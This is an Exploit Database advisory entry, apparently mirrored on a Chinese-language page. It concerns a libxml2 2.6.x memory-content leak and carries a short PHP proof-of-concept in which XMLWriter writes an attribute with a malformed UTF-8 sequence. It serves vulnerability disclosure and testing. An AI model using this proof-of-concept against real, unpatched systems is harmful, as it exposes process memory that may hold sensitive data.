libxml2 2.6.x – ‘XMLWriter::writeAttribute()’ Memory Leak Information Disclosure

• Exploit Database
• 111 阅读

• 作者： Kees Cook
  日期： 2011-01-24
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/35252/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

  source: https://www.securityfocus.com/bid/45973/info   The &apos;libxml2&apos; library is prone to a local information-disclosure vulnerability.   Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.   <?php # Copyright 2010, Canonical, Ltd. # Author: Kees Cook <kees@ubuntu.com> # License: GPLv3 # # Proof-of-concept memory content leak   $xw = new XMLWriter(); $xw->openURI(&apos;php://output&apos;);   $xw->startElement(&apos;input&apos;); $xw->writeAttribute(&apos;value&apos;, "\xe0\x81"); $xw->endElement();   ?>